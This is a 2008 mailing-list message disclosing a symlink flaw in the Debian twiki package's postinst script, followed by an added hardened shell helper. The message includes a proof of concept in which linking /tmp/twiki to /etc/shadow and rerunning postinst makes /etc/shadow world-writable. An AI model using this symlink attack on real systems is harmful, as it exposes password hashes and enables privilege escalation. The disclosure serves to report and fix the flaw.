On Wed Aug 13, 2008 at 11:31:54 +1000, Sven Dowideit wrote:

> I will have to assume that this report is indeed incorrect unless I hear
> otherwise.

On my Debian Etch system:

[EMAIL PROTECTED]:~$ apt-get source twiki
Reading package lists... Done
Building dependency tree... Done
Need to get 4304kB of source archives.
Get: 1 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (dsc) [639B]
Get: 2 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (tar) [4264kB]
Get: 3 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (diff) [39.3kB]
Fetched 4304kB in 7s (546kB/s)
gpg: Signature made Wed 21 Feb 2007 06:51:24 GMT using DSA key ID C0143D2D
gpg: Can't check signature: public key not found
dpkg-source: extracting twiki in twiki-4.0.5
dpkg-source: unpacking twiki_4.0.5.orig.tar.gz
dpkg-source: applying ./twiki_4.0.5-9.1.diff.gz
[EMAIL PROTECTED]:~$ cd twiki-4.0.5/
[EMAIL PROTECTED]:~/twiki-4.0.5$ grep /tmp/twiki debian/postinst
if [ ! -e /tmp/twiki ]; then
mkdir /tmp/twiki
chmod 777 /tmp/twiki
chown $TWIKI_OWNER.www-data /tmp/twiki
[EMAIL PROTECTED]:~/twiki-4.0.5$

So :

1. If /tmp/twiki doesn't exist it is made as a directory.
2. If it does exist its permissions are changed - unconditionally

Let me exploit it:

[EMAIL PROTECTED]:~$
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo apt-get install twiki
Password:
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
  libalgorithm-diff-perl liblocale-maketext-lexicon-perl libtext-diff-perl rcs
Suggested packages:
...
...
Setting up libtext-diff-perl (0.35-2) ...
Setting up rcs (5.7-18) ...
Setting up twiki (4.0.5-9.1) ...
Adding password for user TWikiGuest
Reloading web server config...3224

Now what happened? Nothing. The directory /tmp/twiki was created and my
symlink wasn't touched. So we look safe.

But I'm not convinced. I know that I can coerce it into working:

[EMAIL PROTECTED]:~$ sudo rm -rf /tmp/twiki
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo /var/lib/dpkg/info/twiki.postinst configure
Reloading web server config...3224 .
[EMAIL PROTECTED]:~$ ls -l /etc/shadow
-rwxrwxrwx 1 www-data www-data 1093 2008-08-13 10:35 /etc/shadow

I guess the difference is relating to the presence, or not, of
/var/lib/twiki/data ?

Looks like merely installing the package wouldn't trigger this, but an
upgrade might. Or something like that !

Steve
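
A hardened form of the mkdir/chmod/chown step discussed in this message, as an added example that is not part of the original post or of the twiki package. The helper name `ensure_dir`, the mode 750 and the path in the usage comment are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example, not the package's own postinst code.
# ensure_dir is a hypothetical helper name.
#
# ensure_dir DIR MODE [OWNER:GROUP]
#   returns 0 if DIR ends up as a real directory with MODE (and OWNER if given)
#   returns 1, changing nothing, if DIR is a symlink or not a directory
ensure_dir() {
    dir=$1
    mode=$2
    owner=${3:-}

    # [ -e ] follows symlinks, so it cannot tell a directory from a link to
    # one and reports a dangling link as missing. Test for a link explicitly.
    if [ -L "$dir" ]; then
        echo "ensure_dir: $dir is a symlink, refusing" >&2
        return 1
    fi

    if [ ! -e "$dir" ]; then
        # mkdir does not follow a symlink planted at DIR; it fails with
        # "File exists", so a name created after the test above is rejected.
        mkdir -m "$mode" "$dir" || return 1
    elif [ ! -d "$dir" ]; then
        echo "ensure_dir: $dir exists and is not a directory" >&2
        return 1
    fi

    # Re-check right before changing permissions. This narrows the window
    # but cannot close it while the parent is world-writable, which is why
    # a package state directory belongs outside /tmp.
    [ -d "$dir" ] && [ ! -L "$dir" ] || return 1
    chmod "$mode" "$dir" || return 1
    if [ -n "$owner" ]; then
        chown "$owner" "$dir" || return 1
    fi
    return 0
}

# Usage in a maintainer script (hypothetical path outside /tmp):
#   ensure_dir /var/lib/twiki/tmp 750 "$TWIKI_OWNER:www-data" || exit 1
```
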